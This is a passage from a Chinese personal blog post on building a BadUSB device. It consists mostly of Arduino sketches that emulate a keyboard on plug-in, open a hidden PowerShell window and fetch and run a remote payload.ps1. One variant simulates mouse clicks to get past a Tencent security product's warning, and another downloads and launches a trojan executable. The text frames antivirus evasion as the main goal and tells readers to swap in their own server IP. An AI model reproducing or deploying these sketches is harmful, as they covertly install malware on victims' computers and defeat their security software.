class="line">Keyboard.press(KEY_LEFT_GUI);//win键 </span><br><span class="line">delay(500);</span><br><span class="line">Keyboard.press(<span class="string">'r'</span>);//r键</span><br><span class="line">delay(500); </span><br><span class="line">Keyboard.release(KEY_LEFT_GUI);</span><br><span class="line">Keyboard.release(<span class="string">'r'</span>); </span><br><span class="line">Keyboard.release(KEY_CAPS_LOCK);</span><br><span class="line">delay(500);</span><br><span class="line">Keyboard.println(<span class="string">"CMD"</span>);</span><br><span class="line">delay(500);</span><br><span class="line">Keyboard.press(KEY_RETURN); </span><br><span class="line">Keyboard.release(KEY_RETURN); </span><br><span class="line">delay(3000);</span><br><span class="line">Keyboard.println(<span class="string">"powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString('http://8.8.8.8/payload.ps1') "</span>);</span><br><span class="line">Keyboard.press(KEY_RETURN); </span><br><span class="line">Keyboard.release(KEY_RETURN);</span><br><span class="line">Keyboard.press(KEY_CAPS_LOCK); </span><br><span class="line">Keyboard.release(KEY_CAPS_LOCK);</span><br><span class="line">Keyboard.end();//结束键盘通讯 </span><br><span class="line">&#125;</span><br><span class="line">void <span class="function"><span class="title">loop</span></span>() &#123;&#125;</span><br></pre></td></tr></table></figure>

<p>将代码中的8.8.8.8改为自己服务器IP<br>其实最主要的还是免杀。。。。。</p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>遇到困难不要轻易放弃，奥力给！百度/谷歌都是很好的帮手，另外思路要活。比如powershell默认设置是Restricted(脚本不能运行)，但是我们可以打开 运行 ，通过它来运行powershell脚本而不是打开powershell运行脚本，还有就是最后被拦截一样，换个思路，不一定要免杀马那么复杂的东西，运用badusb的特性一样可以绕过。</p>
<h3 id="扩展代码"><a href="#扩展代码" class="headerlink" title="扩展代码"></a>扩展代码</h3><p>通过修改x，y的值，可通过模拟鼠标点击，绕过沙雕腾讯电脑管家</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line">long basic;</span><br><span class="line">long x;</span><br><span class="line">long y;</span><br><span class="line">String powershell;</span><br><span class="line"></span><br><span class="line">void setup()</span><br><span class="line">&#123;</span><br><span class="line">  basic=9999999; </span><br><span class="line">  x=5000000;</span><br><span class="line">  y=5000000;</span><br><span class="line">  powershell=<span class="string">"powershell.exe  -WindowStyle Hidden -NoLogo  IEX (New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx.xxx/main.ps1');"</span>;</span><br><span class="line">  </span><br><span class="line">  Keyboard.begin();</span><br><span class="line">  Mouse.begin();</span><br><span class="line"></span><br><span class="line">  keyboard_gui();</span><br><span class="line">  keyboard_powershell();</span><br><span class="line">  mouse();</span><br><span class="line"></span><br><span class="line">  Mouse.end();</span><br><span class="line">  Keyboard.end();</span><br><span class="line">&#125;</span><br><span class="line">void keyboard_gui()</span><br><span class="line">&#123;</span><br><span class="line">  Keyboard.begin();</span><br><span class="line">  delay(1000);</span><br><span class="line">  delay(500);</span><br><span class="line">  Keyboard.press(KEY_LEFT_GUI); </span><br><span class="line">  delay(500); </span><br><span class="line">  Keyboard.press(<span class="string">'r'</span>);</span><br><span class="line">  delay(500); </span><br><span class="line">  Keyboard.releaseAll();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">void keyboard_powershell()</span><br><span class="line">&#123;</span><br><span class="line">  Keyboard.println(powershell);</span><br><span class="line">  delay(500); </span><br><span class="line">  Keyboard.press(KEY_RETURN);</span><br><span class="line">  delay(500); </span><br><span class="line">  Keyboard.release(KEY_RETURN);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">void mouse()</span><br><span class="line">&#123;</span><br><span class="line">  delay(500);</span><br><span class="line">  Mouse.move(-basic,-basic,0);</span><br><span class="line">  Mouse.move(-basic,-basic,0);</span><br><span class="line">  Mouse.move(-basic,-basic,0);</span><br><span class="line">  Mouse.move(-basic,-basic,0);</span><br><span class="line">  Mouse.move(-basic,0,0);</span><br><span class="line">  Mouse.move(0,-basic,0);  </span><br><span class="line">  Mouse.move(basic,basic,0);</span><br><span class="line">  Mouse.move(basic,0,0);</span><br><span class="line">  Mouse.move(x,y,0); </span><br><span class="line">  Mouse.click();</span><br><span class="line">  delay(500);</span><br><span class="line">  Mouse.click();</span><br><span class="line">  delay(500);</span><br><span class="line">  Mouse.click();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">void <span class="function"><span class="title">loop</span></span>() &#123;&#125;</span><br></pre></td></tr></table></figure>

<h3 id="其他过狗代码，自行研究"><a href="#其他过狗代码，自行研究" class="headerlink" title="其他过狗代码，自行研究"></a>其他过狗代码，自行研究</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#include &lt;Keyboard.h&gt;</span></span><br><span class="line">void <span class="function"><span class="title">setup</span></span>() &#123;//初始化</span><br><span class="line">Keyboard.begin();//开始键盘通讯</span><br><span class="line">delay(1000);//延时</span><br><span class="line">Keyboard.press(KEY_LEFT_GUI);//win键</span><br><span class="line">delay(200);</span><br><span class="line">Keyboard.press(‘r’);//r键</span><br><span class="line">delay(300);</span><br><span class="line">Keyboard.release(KEY_LEFT_GUI);//释放win 键</span><br><span class="line">Keyboard.release(‘r’);//释放R键</span><br><span class="line">Keyboard.press(KEY_CAPS_LOCK);//切换大小写，绕过输入法</span><br><span class="line">Keyboard.release(KEY_CAPS_LOCK);</span><br><span class="line">Keyboard.println(“cmd “);</span><br><span class="line">delay(200);</span><br><span class="line">Keyboard.press(KEY_RETURN);//按下回车键</span><br><span class="line">delay(200);</span><br><span class="line">Keyboard.release(KEY_RETURN);//按下回车键</span><br><span class="line">delay(500);</span><br><span class="line">Keyboard.println(“powershell “);</span><br><span class="line">Keyboard.press(KEY_RETURN);//按下回车键</span><br><span class="line">delay(200);</span><br><span class="line">Keyboard.release(KEY_RETURN);//按下回车键</span><br><span class="line">delay(500);</span><br><span class="line">Keyboard.println(“<span class="variable">$clnt</span> = new-object System.Net.WebClient; “);</span><br><span class="line">Keyboard.press(KEY_RETURN);//按下回车键</span><br><span class="line">delay(200);</span><br><span class="line">Keyboard.release(KEY_RETURN);//按下回车键</span><br><span class="line">delay(500);</span><br><span class="line">Keyboard.println(“<span class="variable">$url</span>= ‘**********木马地址******’; “);</span><br><span class="line">Keyboard.press(KEY_RETURN);//按下回车键</span><br><span class="line">delay(200);</span><br><span class="line">Keyboard.release(KEY_RETURN);//按下回车键</span><br><span class="line">delay(500);</span><br><span class="line">Keyboard.println(“<span class="variable">$file</span> = ‘ D:\\server.exe’; “);</span><br><span class="line">Keyboard.press(KEY_RETURN);//按下回车键</span><br><span class="line">delay(200);</span><br><span class="line">Keyboard.release(KEY_RETURN);//按下回车键</span><br><span class="line">delay(500);</span><br><span class="line">Keyboard.println(“<span class="variable">$clnt</span>.DownloadFile(<span class="variable">$url</span>,<span class="variable">$file</span>); “);</span><br><span class="line">Keyboard.press(KEY_RETURN);//按下回车键</span><br><span class="line">delay(200);</span><br><span class="line">Keyboard.release(KEY_RETURN);//按下回车键</span><br><span class="line">delay(500);</span><br><span class="line">Keyboard.println(“START D:\\server.exe “);</span><br><span class="line">Keyboard.press(KEY_RETURN);</span><br><span class="line">delay(500);</span><br><span class="line">Keyboard.release(KEY_RETURN);</span><br><span class="line">delay(500);</span><br><span class="line">Keyboard.end();//结束键盘通讯</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">void <span class="function"><span class="title">loop</span></span>()&#123;&#125;//循环</span><br></pre></td></tr></table></figure>
      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在QQ私聊我，也可以邮件至 lingyu195@gmail.com </span>
    </div>
</article>



<div class="article_copyright">
    <p><span class="copy-title">文章标题:</span>&#39;BadUSB制作&#39;</p>
    
    <p><span class="copy-title">本文作者:</span><a href="javascript:void(0)" title="素念">素念</a></p>
    <p><span class="copy-title">发布时间:</span>2019-11-29, 09:25:04</p>
    <p><span class="copy-title">最后更新:</span>2019-11-29, 09:40:25</p>
    <span class="copy-title">原始链接:</span><a class="post-url" href="/2019/11/29/badusb制作/" title="&#39;BadUSB制作&#39;">http://yoursite.com/2019/11/29/badusb制作/</a>
    <p>
        <span class="copy-title">版权声明:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
    </p>
</div>





    




    </div>
    <div class="copyright">
        <p class="footer-entry">©2016-2019 sunian</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full"><span class="min "></span></button>
<button class="post-toc-menu"><span class="post-toc-menu-icons"></span></button>
<div class="post-toc"><span class="post-toc-title">目录</span>
    <div class="post-toc-content">

    </div>
</div>
<a class="" id="rocket" href="javascript:void(0)"></a>
    </div>
</div>
<div class="acParent"></div>

</body>
<script src="//cdn.bootcss.com/jquery.pjax/2.0.1/jquery.pjax.min.js"></script>

<script src="/js/script.js?v=1.0.1" ></script>
<script>
    var img_resize = 'default';
    /*作者、标签的自动补全*/
    $(function () {
        $('.search').AutoComplete({
            'data': ['#Linux基础','#环境搭建','#遇到的问题','#SQL注入','#漏洞复现','#XSS','#基础知识','#代码分析','#渗透测试',],
            'itemHeight': 20,
            'width': 418
        }).AutoComplete('show');
    })
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $(".post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        
        $('pre code').each(function(){
            var lines = $(this).text().split('\n').length - 1, widther='';
            if (lines>99) {
                widther = 'widther'
            }
            var $numbering = $('<ul/>').addClass('pre-numbering ' + widther).attr("unselectable","on");
            $(this).addClass('has-numbering ' + widther)
                    .parent()
                    .append($numbering);
            for(var i=1;i<=lines;i++){
                $numbering.append($('<li/>').text(i));
            }
        });
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<style>
    pre{
        position: relative;
        margin-bottom: 24px;
        border-radius: 10px;
        border: 1px solid #e2dede;
        background: #FFF;
        overflow: hidden;
    }
    code.has-numbering{
        margin-left: 30px;
    }
    code.has-numbering.widther{
        margin-left: 35px;
    }
    .pre-numbering{
        margin: 0px;
        position: absolute;
        top: 0;
        left: 0;
        width: 20px;
        padding: 0.5em 3px 0.7em 5px;
        border-right: 1px solid #C3CCD0;
        text-align: right;
        color: #AAA;
        background-color: ;
    }
    .pre-numbering.widther {
        width: 35px;
    }
</style>

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
        .nav .hide-list.fullscreen {
            left: 492px
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.3;
        background: url("https://i.loli.net/2019/07/22/5d3521411f3f169375.png");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style>







</html>
